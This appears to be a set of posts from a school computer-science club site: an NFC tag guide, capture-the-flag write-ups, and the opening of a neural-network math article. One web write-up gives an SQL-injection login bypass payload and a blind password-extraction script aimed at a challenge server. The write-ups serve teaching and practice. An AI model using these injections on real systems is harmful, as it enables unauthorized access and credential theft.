*by AppVenture, NUSH's Computer Science Interest Group*

Welcome to NUS High! We are AppVenture, NUSH's Computer Science Interest Group. Come down to our booth during IG Fair to learn more about us, and follow us on Instagram at **@appventure_nush** for interesting posts about computer science!

Or, browse the website you are on right now, nush.app, which is made and maintained by our members!

Near Field Communication (NFC) technology allows wireless communication between two electronic devices close to each other, at a distance of up to 1.5 inches (3.81 cm).

The most common example is communication between a device like a smartphone (active - has a power source) and a readable NFC tag (passive - no power source). This communication is possible because the reading device, often your smartphone, can generate a radio frequency (RF) field to power the tag. In Singapore, you can use your phone's NFC capabilities to pay for transit fares at the EZ-Link readers!

The NFC tag you're holding has many applications! Do your best to use this NFC tag in fun and interesting ways :)

Here are some example applications (we encourage you to come up with more!):

- Directing people to websites (like in this case), or launching applications
- Contactless payments, similar to Google Pay and Apple Pay
- Automating tasks, like connecting to Wi-Fi or Bluetooth networks, unlocking smart locks, authenticating (2FA) with security key, or triggering shortcuts/automation on your phone (eg. iOS Shortcuts, for Android you can use other 3rd party apps)
- Creative purposes, like sharing media content, or creating digital business cards
- Other cool stuff like setting focus modes, silencing your phone, controlling smart home accessories, playing your favorite music, or setting timers

The NFC tag you've been given is a rewritable NFC tag: as long as your phone supports NFC and you have an NFC tag writer application, you can program it! Hence, you can reuse it for as many applications as you would like.

**You may need to go to your phone settings to enable NFC.** If there is no NFC option in your settings and you can't get the tag to work, your phone may not support NFC: phones running Android 10/iOS 13 or later should support it (which covers most phones made in the last 6 years).

To read/write the NFC tag, put the NFC tag on the back of your phone, near the camera area. If it doesn't work, try taking off your phone case or moving the NFC tag all over the back of your phone.

Download the app "*NFC TagWriter by NXP*". Other NFC tag apps will work too, but this is among the most popular ones.

**The app has the below functions:**

- *Read tags* – reads the content of the tag. Useful to check what information an unknown tag stores, and to see if it's malicious or not.
- *Write tags* – what we want to do. Writes new instructions/information to the tag.
- *Erase tags* – erases the contents of a tag.
- *Protect tags* – sets a password on your tag to prevent anyone from just overwriting it, hence "protecting" it.

**Warning**: once you "lock" your tag (not "protect"), nobody (not even you) can write it again, and it will be read-only, so **do not lock your tag** unless you are very sure that you never want to edit it again!

If you're a fan of long PDFs, you can also refer to the official documentation here, for more advanced functionalities. If there's any feature you don't understand, we encourage you to search it online and find out for yourself!

Open TagWriter, and you should see the below screen.

"Dataset" refers to the instructions you want to give your NFC tag. The app automatically saves prior instructions in "My datasets".

- Press "Write tags", then press "New dataset" to start writing to your NFC tag.
- Choose what to write from a variety of options, and enjoy!

If you have any queries or still can't get it to work, you can DM **@appventure_nush** on Instagram or email us at appventure@nushigh.edu.sg, or come to our booth during IG Fair! Tag us on Instagram to showcase your creative applications, or tell us during IG Fair :)

We hope you will explore more about NFC tags and use this NFC tag creatively. After all, experiment, explore, excel!

Signing off,

AppVenture Exco 2024


*The tags are here if you want more product information.*

Tags: rev

We are given a `challenge.mir`. Apparently `mir` (*mid-level intermediate representation*) is a transient file that the Rust compiler uses. It consists of many, many functions (`func001`, `func002`, `func003`, etc.), and a main function.

We decided to do the stupid thing and manually reverse it by hand, painstakingly.

Let's dig into the main function first. It first defines like 120 variables, but we can worry about that later; the nested `scope { }` blocks are also all useless.

We see a lot of `bb0`, `bb1`, etc. Those are *basic blocks* inside the `.mir` file. They represent a sequence of instructions or statements, and determine how the program flows. Let's start with `bb0` in `main`:

```
bb0: {
_1 = func001(const 126_u8) -> bb1;
}
```

where `func001` is:

```
fn func001(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: u8;
let mut _3: (u8, bool);
let mut _4: u8;
let mut _5: u8;
let mut _6: (u8, bool);
let mut _7: (u8, bool);
scope 1 {
debug retn => _0;
}
bb0: {
_0 = _1;
_2 = _0;
_3 = CheckedShr(_2, const 3_i32); // rshift _3 by 3
assert(!move (_3.1: bool), "attempt to shift right by `{}`, which would overflow", const 3_i32) -> bb1;
}
bb1: {
_0 = move (_3.0: u8);
_5 = _0;
_6 = CheckedMul(_5, const 4_u8); // multiply _5 by 4
assert(!move (_6.1: bool), "attempt to compute `{} * {}`, which would overflow", move _5, const 4_u8) -> bb2;
}
bb2: {
_4 = move (_6.0: u8);
_7 = CheckedAdd(_4, const 7_u8); // add 7 to _4
assert(!move (_7.1: bool), "attempt to compute `{} + {}`, which would overflow", move _4, const 7_u8) -> bb3;
}
bb3: {
_0 = move (_7.0: u8);
return;
}
}
```

Which is basically:

```
bb0: {
_1 = (126 >> 3) * 4 + 7 -> bb1; // 67
}
```
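As a quick sanity check, the collapsed arithmetic can be replayed in plain Python (a sketch, not part of the challenge files):

```python
def func001(ch: int) -> int:
    # Replays func001's arithmetic: right-shift by 3, multiply by 4, add 7
    return (ch >> 3) * 4 + 7

print(func001(126), chr(func001(126)))  # 67 C
```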

Now let's see `bb1`:

```
bb1: {
_3 = _1;
_2 = move _3 as char (IntToInt);
_4 = func002(const 51_u8) -> bb2;
}
```

We see it makes a char labelled `_2`, which I assume is one of the characters of the flag. It also feeds `bb2`, the next block, with `func002(51)`, which will later become another character of the flag. From now on we just focused on evaluating these `funcxxx()` calls and their outputs.

The next several functions are all elementary ones, consisting of addition, subtraction, multiplication, division, and bitwise operators.

The next different one is `func010`:

```
fn func010(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: std::ops::Range<i32>;
let mut _3: std::ops::Range<i32>;
let mut _5: std::option::Option<i32>;
let mut _6: &mut std::ops::Range<i32>;
let mut _7: isize;
let mut _8: (u8, bool);
scope 1 {
debug retn => _0;
let mut _4: std::ops::Range<i32>;
scope 2 {
debug iter => _4;
}
}
bb0: {
_0 = _1;
_3 = std::ops::Range::<i32> { start: const 0_i32, end: const 10_i32 }; // loop of count 10
_2 = <std::ops::Range<i32> as IntoIterator>::into_iter(move _3) -> bb1;
}
bb1: {
_4 = move _2;
goto -> bb2;
}
bb2: {
_6 = &mut _4;
_5 = <std::ops::Range<i32> as Iterator>::next(_6) -> bb3;
}
bb3: {
_7 = discriminant(_5);
switchInt(move _7) -> [0: bb6, 1: bb4, otherwise: bb5];
}
bb4: {
_8 = CheckedAdd(_0, const 1_u8); // add one
assert(!move (_8.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb7;
}
bb5: {
unreachable;
}
bb6: {
return;
}
bb7: {
_0 = move (_8.0: u8);
goto -> bb2;
}
}
```

It is essentially a for loop of count 10, and each iteration `_0` gets incremented by 1 (via `_8`). Therefore `func010(109) = 119`, which corresponds to `'w'`.
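In Python, a sketch of the same loop:

```python
def func010(ch: int) -> int:
    # A loop of count 10; each iteration adds 1 to the input
    for _ in range(10):
        ch += 1
    return ch

print(func010(109), chr(func010(109)))  # 119 w
```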

The next several functions are also elementary ones, consisting of addition, subtraction, multiplication, division, bitwise operators, and exponentiation.

The next different one is `func018`:

```
fn func018(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _3: u8;
let mut _4: usize;
let mut _5: u8;
let mut _6: (u8, bool);
scope 1 {
debug retn => _0;
let _2: &str;
scope 2 {
debug s => _2;
}
}
bb0: {
_0 = _1;
_2 = const "fightingkeepgoing";
_4 = core::str::<impl str>::len(_2) -> bb1; // gets string length (17)
}
bb1: {
_3 = move _4 as u8 (IntToInt);
_5 = _0;
_6 = CheckedAdd(_3, _5); // input + 17
assert(!move (_6.1: bool), "attempt to compute `{} + {}`, which would overflow", move _3, move _5) -> bb2;
}
bb2: {
_0 = move (_6.0: u8);
return;
}
}
```

It creates a string `"fightingkeepgoing"`, gets the length of the string (17) and adds it to the input. Hence `func018(50) = 67`, which as a char is `'C'`.
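Again as a Python sketch:

```python
def func018(ch: int) -> int:
    # Adds the length of the constant string (17) to the input
    return ch + len("fightingkeepgoing")

print(func018(50), chr(func018(50)))  # 67 C
```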

`func020` is almost the same as `func010`, except it increments by 3 each time instead of 1; therefore `func020(54) = 84`, which is `'T'`.

The next different function is `func030`:

```
fn func030(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _3: (i32, bool);
let mut _4: (u8, bool);
let mut _5: i32;
scope 1 {
debug retn => _0;
let mut _2: i32;
scope 2 {
debug chk => _2;
}
}
bb0: {
_0 = _1;
_2 = const 0_i32;
goto -> bb1;
}
bb1: {
_3 = CheckedAdd(_2, const 1_i32);
assert(!move (_3.1: bool), "attempt to compute `{} + {}`, which would overflow", _2, const 1_i32) -> bb2;
}
bb2: {
_2 = move (_3.0: i32);
_4 = CheckedAdd(_0, const 1_u8);
assert(!move (_4.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb3;
}
bb3: {
_0 = move (_4.0: u8);
_5 = _2;
switchInt(move _5) -> [8: bb4, otherwise: bb1];
}
bb4: {
return;
}
}
```

`_2` is initialized at 0. `bb1` and `bb2` increment `_2` and `_0` by 1 each time, and `bb3` checks if `_2` is 8. So the end result is the input incremented by 8. Therefore `func030(100) = 108`, which is `'l'`.
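A Python sketch of the same loop:

```python
def func030(ch: int) -> int:
    # Increment a counter and the input together until the counter hits 8
    chk = 0
    while chk != 8:
        chk += 1
        ch += 1
    return ch

print(func030(100), chr(func030(100)))  # 108 l
```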

The last weird function is `func033`:

```
fn func033(_1: u8) -> u8 {
debug ch => _1;
let mut _0: u8;
let mut _2: std::ops::Range<i32>;
let mut _3: std::ops::Range<i32>;
let mut _5: std::option::Option<i32>;
let mut _6: &mut std::ops::Range<i32>;
let mut _7: isize;
let mut _9: i32;
let mut _10: (u8, bool);
scope 1 {
debug retn => _0;
let mut _4: std::ops::Range<i32>;
scope 2 {
debug iter => _4;
let _8: i32;
scope 3 {
debug i => _8;
}
}
}
bb0: {
_0 = _1; // 106
_3 = std::ops::Range::<i32> { start: const 0_i32, end: const 10_i32 };
_2 = <std::ops::Range<i32> as IntoIterator>::into_iter(move _3) -> bb1;
}
bb1: {
_4 = move _2;
goto -> bb2;
}
bb2: {
_6 = &mut _4;
_5 = <std::ops::Range<i32> as Iterator>::next(_6) -> bb3;
}
bb3: {
_7 = discriminant(_5);
switchInt(move _7) -> [0: bb6, 1: bb4, otherwise: bb5];
}
bb4: {
_8 = ((_5 as Some).0: i32);
_9 = Rem(_8, const 2_i32);
switchInt(move _9) -> [0: bb7, otherwise: bb2];
}
bb5: {
unreachable;
}
bb6: {
return;
}
bb7: {
_10 = CheckedAdd(_0, const 1_u8);
assert(!move (_10.1: bool), "attempt to compute `{} + {}`, which would overflow", _0, const 1_u8) -> bb8;
}
bb8: {
_0 = move (_10.0: u8);
goto -> bb2;
}
}
```

This can be re-written as:

```
func033(input){
    for (let i = 0; i < 10; i++){
        if (i % 2 == 0){
            input += 1
        }
    }
    return input
}
```

Therefore `func033(106) = 111`, which is `'o'`.

Final flag: `CDDC2023{w0w_YOU_CuT_cR4b_Be1ly_oP3N}`

Tags: web

Login with the admin ! http://52.78.16.36:8881/web1/index.php

So we are given a username and password field. I tried username `admin` and password `' or 1=1;#` and it worked: it just said "Hello admin". So it is vulnerable to SQL injection.

I assumed that the query was something like this:

```
SELECT <thing> FROM <thetable> WHERE id = '{id}' AND pw = '{pw}';
```
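To see why the payload works, here's how it would slot into that assumed query shape (the `<thing>`/`<thetable>` placeholders are kept as-is, since the real names are unknown):

```python
uid, pw = "admin", "' or 1=1;#"
# Build the (assumed) vulnerable query by naive string interpolation
query = f"SELECT <thing> FROM <thetable> WHERE id = '{uid}' AND pw = '{pw}';"
print(query)
# SELECT <thing> FROM <thetable> WHERE id = 'admin' AND pw = '' or 1=1;#';
```

The leading quote closes the `pw` string early, `or 1=1` makes the condition always true, and `#` comments out the trailing quote.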

We see that the URL is `http://52.78.16.36:8881/web1/?id=admin&pw=password`, so the column name is probably `pw`, so we can inject:

```
' or 1=1 or pw LIKE '%';#
```

We then replace the `%` with increasingly many `_` until we find one that matches... oh wait, it says "no hack", so that probably does not work. Whatever; since `%` is not filtered, let's use that to get the password:

```
import requests

base = "http://52.78.16.36:8881/web1/"
arr = []
id = 40
print(f"base url: {base}")
while True:
    char = chr(id)
    pw = f"' OR pw LIKE '{''.join(arr)}{char}%';#"
    params = {'id': 'admin', 'pw': pw}
    res = requests.get(base, params=params)
    if id == 127:
        print("end: "+pw)
        break
    elif 'Hello admin' in res.text:
        arr.append(char)
        id = 40
        print("Correct: "+pw)
    else:
        print("Wrong: "+pw)
        id += 1
```

The result is `end: ' OR pw LIKE 'ADMIN123PW⌂%';#`; ignoring the last few bits, we get `ADMIN123PW`, but that still doesn't give us the flag. Since `LIKE` is not case-sensitive, and we can't use `SUBSTRING` since I don't know the table name, we can only try different combinations of upper- and lowercase. I tried all lowercase (i.e. `admin123pw`) and got the flag.

Category: Crypto

Entire Challenge:

```
assert __import__('re').fullmatch(r'SEE{\w{23}}',flag:=input()) and not int.from_bytes(flag.encode(),'big')%13**37
```

The assert statement raises an error if the condition given is not fulfilled; otherwise nothing happens. The first part of the condition is a regex match of the form `SEE{\w{23}}`, thus the flag contains 23 word characters inside the curly braces. The second part of the condition ensures that the flag, converted from its bytes to a (long) integer, is divisible by $13^{37}$.

I actually tried a lot of things at first like brute force and greedy from right to left, but they didn't even come close

The first realisation came when I realised that a bytestring `b'abc'` can be represented as $2^{16}\cdot$ `b'a'` $+\ 2^8\cdot$ `b'b'` $+\ 2^0\cdot$ `b'c'`, so essentially you are trying to solve for

`b'SEE{...}'` $+ \sum_{i=1}^{23} 2^{8i} x_i \equiv 0 \pmod{13^{37}}$

where all of the $x_i$ satisfy `\w`.
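This byte-place-value view is easy to verify in plain Python:

```python
# A bytestring is just a base-256 integer: each byte is one "digit"
n = int.from_bytes(b'abc', 'big')
assert n == 2**16 * ord('a') + 2**8 * ord('b') + 2**0 * ord('c')
print(n)  # 6382179
```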

By default I would have no idea how to implement this and it kinda looks impossible, but when trying this challenge I remembered hearing a lot of stuff about LLL to solve equations and I wanted to join in on the fun

So understanding LLL was quite the learning curve but essentially what it does is, given a lattice basis

$$ \begin{bmatrix} 1 & 1 & 1\\ -1 & 0 & 2\\ 3 & 5 & 6 \end{bmatrix} $$

it will find multiple sets of (nonzero?) integers $a, b, c$ such that

$$ a \begin{bmatrix} 1 & 1 & 1 \end{bmatrix} + b \begin{bmatrix} -1 & 0 & 2 \end{bmatrix} + c \begin{bmatrix} 3 & 5 & 6 \end{bmatrix} $$

is as "short" as possible, i.e. minimize the abs of all the values

This is definitely not totally correct, but I haven't fully figured it out.

Anyways, we can try to get LLL to help us find $x_i$ for us to make the total $\pmod{13^{37}}$ as close as possible to 0.

Usually to minimize $ax_1 + bx_2 + cx_3$ you can use the matrix

$$ \begin{bmatrix} 1 & 0 & 0 & x_1\\ 0 & 1 & 0 & x_2\\ 0 & 0 & 1 & x_3 \end{bmatrix} $$

which would return some vectors looking like

$$\begin{bmatrix}a & b & c & ax_1 + bx_2 + cx_3 \end{bmatrix}$$

Similarly, here we can do

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 2^{8 \cdot 23} \\ 0 & 1 & 0 & \dots & 0 & 2^{8 \cdot 22} \\ 0 & 0 & 1 & \dots & 0 & 2^{8 \cdot 21} \\ \vdots & \vdots & \vdots & \ddots & \vdots & \vdots \\ 0 & 0 & 0 & \dots & 1 & 2^{8 \cdot 1} \end{bmatrix} $$

but since we are taking this $\pmod{13^{37}}$ we simply add another row to automatically reduce any result as such:

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 2^{8 \cdot 23} \\ 0 & 1 & 0 & \dots & 0 & 2^{8 \cdot 22} \\ 0 & 0 & 1 & \dots & 0 & 2^{8 \cdot 21} \\ \vdots & \vdots & \vdots & \ddots & \vdots & \vdots \\ 0 & 0 & 0 & \dots & 1 & 2^{8 \cdot 1} \\ 0 & 0 & 0 & \dots & 0 & -13^{37} \end{bmatrix} $$

But now we have to consider the fixed bytes of `SEE{` and `}` that we start with, which we will use $c$ to represent. We need to add this to the final column, but the problem is: how do we ensure that this row will be multiplied by exactly 1?

The way I did this is to basically "reward" it by adding $-1$ to the identity part of the matrix so that if it adds this row once those parts will "cancel" out nicely(unsure if needed). I also added another column so that I can check if this was added once

$$ \begin{bmatrix} 1 & 0 & 0 & \dots & 0 & 0 & 2^{8 \cdot 23} \\ 0 & 1 & 0 & \dots & 0 & 0 & 2^{8 \cdot 22} \\ 0 & 0 & 1 & \dots & 0 & 0 & 2^{8 \cdot 21} \\ \vdots & \vdots & \vdots & \ddots & \vdots & \vdots & \vdots \\ 0 & 0 & 0 & \dots & 1 & 0 & 2^{8 \cdot 1} \\ 0 & 0 & 0 & \dots & 0 & 0 & -13^{37} \\ -1 & -1 & -1 & \dots & -1 & 1 & c \end{bmatrix} $$

This way, if LLL finds a vector ending with $\begin{bmatrix}1&0\end{bmatrix}$, I'll know $c$ was only added once, as that column only has a nonzero element in that row, and I'll also know that a valid solution for $x_i$ was found, as the final column sums to 0.

But as inspired by the example given on the wikipedia page for LLL, the sum of the final column being 0 matters a LOT, and is actually the only sum we care to minimize (other than keeping the 2nd last column at 1), so what we can do is multiply a weight to this column to make it more important to minimize.

So, after doing testing, the first weights that worked for me were $2^{8 \cdot 23}$ for the last 2 columns and $1$ for everything else. The implementation (Sage):

```
from Crypto.Util.number import bytes_to_long

start = 2**(8*24) * bytes_to_long(b"SEE{") + bytes_to_long(b"}")
W = diagonal_matrix([1]*23 + [2^(8*23), 2^(8*23)])
I = Matrix.identity(23)
right1 = Matrix([0] * 23).T
right2 = Matrix([2^(8*i) for i in range(1, 24)]).T
bottom1 = Matrix([0] * 23 + [0, -13^37])
bottom2 = Matrix([-1] * 23 + [1, start])
L = I.augment(right1).augment(right2).stack(bottom1).stack(bottom2)
sol = (L*W).LLL()/W
for row in sol:
    print(row)
```

And we actually get a row ending with $\begin{bmatrix}1&0\end{bmatrix}$: the final row, `(-19, 6, 1, -23, -3, -26, -6, -6, -16, 17, -24, -48, 16, 13, -22, -1, 11, 23, -38, 12, 6, 23, 7, 1, 0)`.

To get the solution from here, we re-add the 1 subtracted in the last row to the first 23 numbers.

But anyways, this still isn't the solution. Quite obviously, the values of $x_i$ here go into the negatives, which don't make valid characters for the flag. What characters are even valid anyway?

```
import re
import string

good = ""
for i in string.printable:
    if re.fullmatch(r'\w', i):
        good += i
```

`0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_`

Yeah, this is not a lot to work with, but whatever. Anyways, to make the values obtained more positive and around these values, I realised that since they are currently kind of distributed around 0, and I have to add 1 to compensate for the last row, what if I just make it so I have to add a lot more?

Essentially, set those values not to $-1$ but to something like $-90$, so that after adding 90 I get nice values. Doing this and adding back 90, we get the values

`116, 76, 65, 94, 109, 94, 73, 93, 79, 75, 96, 109, 73, 75, 108, 68, 89, 46, 111, 58, 92, 46, 63`

which are way nicer and almost look correct. But actually, 9 of these numbers are invalid characters.

From here, real hell began, where I had to keep changing the offsets and the weights to try to magically get a valid set of values. However, for unexplainable reasons I kept getting rows with 1 bad value (a value of 140, most of the time). This is probably because the challenge was set so that it was barely possible to find a valid string.

Anyways after much experimentation, the final code that found the flag for me was

```
found = False
while not found:
    offsets = [-93] * 23
    W = diagonal_matrix([random.choice([9/10, 1, 11/10]) for _ in range(23)] + [2^(3), 2^(7)])
    I = Matrix.identity(23)
    right1 = Matrix([0] * 23).T
    right2 = Matrix([2^(8*i) for i in range(1, 24)]).T
    bottom1 = Matrix([0] * 23 + [0, -13^37])
    bottom2 = Matrix(offsets + [1, start])
    L = I.augment(right1).augment(right2).stack(bottom1).stack(bottom2)
    sols = (L*W).LLL()/W
    for row in sols:
        if row[-2] == 1 and row[-1] == 0:
            # count3 (helper defined elsewhere) counts values that don't map to valid flag characters
            count = count3(row[:-2], offsets)
            if count == 0:
                print(row[:-2])
                print("SEE{" + "".join([chr(row[:-2][x] - offsets[x]) for x in range(len(row[:-2]))])[::-1] + "}")
                found = True
            else:
                print("row:" + str(row))
                print("offsets:" + str(offsets))
                print("count:" + str(count))
```

giving `SEE{luQ5xmNUKgEEDO_c5LoJCum}` eventually.

Category: Crypto

They give:

```
import ecdsa # https://pypi.org/project/ecdsa/
import os
flag = os.environ.get('FLAG', 'SEE{not_the_real_flag}').encode()
sk = ecdsa.SigningKey.generate()
for nibble in flag.hex():
    signature = sk.sign(flag + nibble.encode())
    print(signature.hex())
```

Basically, for every digit in the flag's hex, they append that digit to the flag and then sign it with ecdsa, and print the signature. The thing is,

- Signatures are not meant to encrypt a message
- The fact that they randomly append a digit to the flag every time is highly suspicious

So doing a little bit of testing we can see that

```
flag = b"SEE{"
for nibble in flag.hex():
    print(flag + nibble.encode())
"""
b'SEE{5'
b'SEE{3'
b'SEE{4'
b'SEE{5'
b'SEE{4'
b'SEE{5'
b'SEE{7'
b'SEE{b'
"""
```

There are only 16 digits in hex and they get repeated quite often, so we are signing the same message in some cases, but how to use this to our advantage?

ECDSA:

$$r = (kG).x$$

$$s = k^{-1} (h + rd)$$

where $k$ is a randomly generated nonce, $h$ is the hashed message, and $d$ is the private key.

When comparing two signatures of the same message, we can see that $h$ and $d$ remain the same, while $r$ is known. So, how to deal with $k$? Seeing that we have $k$ and $k^{-1}$, yeah, it's quite obvious:

$$R * s = kG * k^{-1} (h + rd) = G (h+rd)$$

Now, between two signatures of the same message, the only differing variable is $r$, hence we can expect

$$R_1 s_1 - R_2 s_2 = G(h+r_1 d) - G(h+r_2 d) = G(r_1-r_2)d$$

You can use this to basically identify each character by comparing it to a signature of that character, and checking whether the difference multiplied by $(r_1-r_2)^{-1}$ is $Gd$, which is the same throughout

First, compare to existing characters in `SEE{}`:

```
p = 0xfffffffffffffffffffffffffffffffeffffffffffffffff
K = GF(p)
a = K(0xfffffffffffffffffffffffffffffffefffffffffffffffc)
b = K(0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1)
E = EllipticCurve(K, (a, b))
G = E(0x188da80eb03090f67cbf20eb43a18800f4ff0afd82ff1012, 0x07192b95ffc8da78631011ed6b24cdd573f977a11e794811)
E.set_order(0xffffffffffffffffffffffff99def836146bc9b1b4d22831 * 0x1)
n = E.order()
sigs = []
for i in output.split("\n"):
    sigs.append(ecdsa.util.sigdecode_string(bytes.fromhex(i), order=E.order()))
sigs
# 5345457b...
r1, s1 = sigs[0]
r2, s2 = sigs[3]
r3, s3 = sigs[2]
r4, s4 = sigs[4]
assert (E.lift_x(ZZ(r1)) * s1 - E.lift_x(ZZ(r2)) * s2) * pow(r1 - r2, -1, n) == (E.lift_x(ZZ(r3)) * s3 - -E.lift_x(ZZ(r4)) * s4) * pow(r3 - r4, -1, n)
Gd = (E.lift_x(ZZ(r1)) * s1 - E.lift_x(ZZ(r2)) * s2) * pow(r1 - r2, -1, n)
flag = list(b"SEE{".hex() + (len(sigs)-10) * "." + b"}".hex())
for i in tqdm([0,1,2,3,4,5,6,7,-2,-1]):
    r1, s1 = sigs[i]
    for j in range(len(sigs)):
        r2, s2 = sigs[j]
        a = E.lift_x(ZZ(r1)) * s1
        b = E.lift_x(ZZ(r2)) * s2
        try:
            thes = [(a-b) * pow(r1 - r2, -1, n), (a+b) * pow(r1 - r2, -1, n), (-a-b) * pow(r1 - r2, -1, n), (-a+b) * pow(r1 - r2, -1, n)]
        except Exception as e:
            continue
        if Gd in thes:
            flag[j] = flag[i]
```

and we get `5345457b.5..737.5.7..5..737.5....5.d....5.737.75.5.57.7.5.73...7....74757..55..4..7374.....775..73...57.7d`

For remaining digits:

```
for i in tqdm(range(len(flag))):
    if flag[i] == ".":
        r1, s1 = sigs[i]
        for j in range(len(sigs)):
            r2, s2 = sigs[j]
            a = E.lift_x(ZZ(r1)) * s1
            b = E.lift_x(ZZ(r2)) * s2
            try:
                thes = [(a-b) * pow(r1 - r2, -1, n), (a+b) * pow(r1 - r2, -1, n), (-a-b) * pow(r1 - r2, -1, n), (-a+b) * pow(r1 - r2, -1, n)]
            except Exception as e:
                continue
            if Gd in thes:
                flag[j] = i**2
                flag[i] = i**2

def replace_all(lst, old, new):
    return [x if x != old else new for x in lst]

h = flag
for j in range(7):
    h = replace_all(h, remaining[j], "TUVWXYZ"[j])
hh = replace_all(h, "T", "6")
hh = replace_all(hh, "Z", "1")
hh = replace_all(hh, "U", "9")
hh = replace_all(hh, "V", "f")
hh = replace_all(hh, "X", "e")
realflag = ""
for i in range(0, len(hh), 2):
    if hh[i] not in "TUVWXYZ" and hh[i+1] not in "TUVWXYZ":
        print(hh[i]+hh[i+1] + " " + bytes.fromhex(hh[i]+hh[i+1]).decode())
        realflag += bytes.fromhex(hh[i]+hh[i+1]).decode()
    else:
        print(hh[i]+hh[i+1])
        realflag += "?"
```

which gets `SEE{easy_?easy_?emon_squee?y_signatu?e_distinguis?e?}`, and the remaining digits can be guessed.

**Mathematics** is an area of knowledge that includes the study of such topics as numbers, formulas and related structures, shapes and the spaces in which they are contained, and quantities and their changes. There is no general consensus about its exact scope or epistemological status. It is, however, extremely laborious and time-consuming, but necessary, and sometimes (albeit very rarely) interesting.

Neural networks are somewhat interesting. Everyone kind of knows the math behind NNs (the gist of it). It was taught in **CS5131** to a very limited extent, but not many know the full math behind deep and convolutional neural networks. I mean, people get that it has something to do with backpropagation or whatever, but how do you scale it up to multiple values and multiple derivatives? As you will come to learn, these derivations are incredibly computationally intensive and time-consuming, especially during implementation. But I have done it because I care about AppVenture and I want to help the casual onlooker understand the many trials and tribulations a simple layer goes through to deliver what we should consider peak perfection. It was a fun but painful exercise, and I gained a deeper understanding of the mathematical constructs that embody our world. Anyways, let's start out with a refresher. Be warned that matrix math lurks ahead, so tread with caution. This is deeper than **CS5131** could have ever hoped to cover, so you will learn some stuff from this exercise. This first part is about the math behind deep neural networks.

This article is written with some assumed knowledge of the reader but it is not that bad for most CS students especially since NNs are baby level for the most part. Nonetheless, assumed knowledge is written below.

- Deep Neural Network (How to implement + basic understanding of the math)
- Gradient Descent
- Linear Algebra

If you don't know this stuff, all you really need to do is read an introduction to linear algebra, understand how matrices and vectors are multiplied and watch 3b1b's series on machine learning.

Let's start by importing our bff for life, **Numpy**.

```
>>> import numpy as np
```

Numpy is introduced in CS4132 (or PC6432 for some reason), but for a quick summary, it is a linear algebra library, which means it is VERY useful for this task.

Observe the following series of mathematical equations:

$$ \begin{aligned} 4a+2b&=22\\ 3a+8b&=49 \end{aligned} $$

Despite the fact that solving these is pretty easy (as we learnt in Year 1), let's try going with a different solution from what is usually portrayed. Let's try using **gradient descent**.
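For reference, the direct solve we are deliberately avoiding gives the answer we should eventually land on (a quick numpy check):

```python
import numpy as np

A = np.array([[4.0, 2.0], [3.0, 8.0]])
b = np.array([22.0, 49.0])
x = np.linalg.solve(A, b)  # direct linear solve, just to know the target
print(x)  # [3. 5.] -> a = 3, b = 5
```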

If you remember, gradient descent is a method for solving equations by taking steps towards the true value, using calculus to predict the direction and size of each step. Essentially, if you remember from calculus, the minimum of a graph has a tangent of slope 0, and hence we can use the slope to work out the direction of these "steps" towards the solution. We just need a function whose derivative and value both approach 0 as you get closer to the true solution. This function is known as the objective function.

As you probably know, a linear equation is written as such:

$$ A \mathbf{x}-\mathbf{b}=0 $$

where $A$ is a known square matrix, $\mathbf{b}$ is a known vector and $\mathbf{x}$ is an unknown vector.

In this case, we will use the Linear Least Squares (LLS) function, written below, as the objective, since it is an accurate thing to minimize here.

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}_{2}^{2} $$
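Jumping ahead a little, here is what minimizing this objective looks like numerically. This is a minimal numpy sketch, using the gradient $2A^{T}(A\mathbf{x}-\mathbf{b})$ that the derivation below builds towards:

```python
import numpy as np

A = np.array([[4.0, 2.0], [3.0, 8.0]])
b = np.array([22.0, 49.0])

def F(x):
    # Linear least squares objective: squared 2-norm of the residual Ax - b
    r = A @ x - b
    return float(r @ r)

x = np.zeros(2)
lr = 0.005  # step size small enough for this particular A
for _ in range(2000):
    x -= lr * 2 * A.T @ (A @ x - b)  # step against the gradient

print(F(np.zeros(2)))  # 2885.0 at the starting guess (22^2 + 49^2)
print(x)               # converges to [3. 5.]
```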

Now, what do the weird lines and the two occurrences of "2" above mean, and how exactly do we calculate the derivative of a scalar with respect to a vector? Well, we have to learn matrix calculus, a very peculiar domain of math that is very torturous. Ideally, you want to avoid this at all costs, but I will walk gently through this stuff.

Firstly, let's revise derivatives with this simple example:

$$ \newcommand{\dv}[2]{\frac{\mathrm{d}{#1}}{\mathrm{d}{#2}}} \newcommand{\ddv}[1]{\frac{\mathrm{d}}{\mathrm{d}{#1}}} \begin{aligned} y&=\sin(x^2)+5\\ \dv{y}{x}&=\ddv{x}(\sin(x^2)+5)\\ &=2x \cos(x^2) \end{aligned} $$

For functions with multiple variables, we can find the partial derivative with respect to each of the variables, as shown below:

$$ \newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}} \newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}} \begin{aligned} f(x,y)&=3xy+x^2\\ \ppv{x}(f(x,y))&=3y+2x\\ \ppv{y}(f(x,y))&=3x \end{aligned} $$

A thing to understand is that vectors are just a collection of numbers, so an $n$-sized vector will have $n$ partial derivatives if the function is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ (this collected derivative is known as the gradient). But do we represent these $n$ partial derivatives as a column vector or a row vector?

$$
\newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}}
\newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}}
\pv{y}{\mathbf{x}} =
\begin{bmatrix}
\pv{y}{{\mathbf{x}}_{1}}\\
\pv{y}{{\mathbf{x}}_{2}}\\
\vdots\\
\pv{y}{{\mathbf{x}}_{n}}
\end{bmatrix}
$$

$$
\newcommand{\pv}[2]{\frac{\partial {#1}}{\partial {#2}}}
\newcommand{\ppv}[1]{\frac{\partial}{\partial {#1}}}
\pv{y}{\mathbf{x}} =
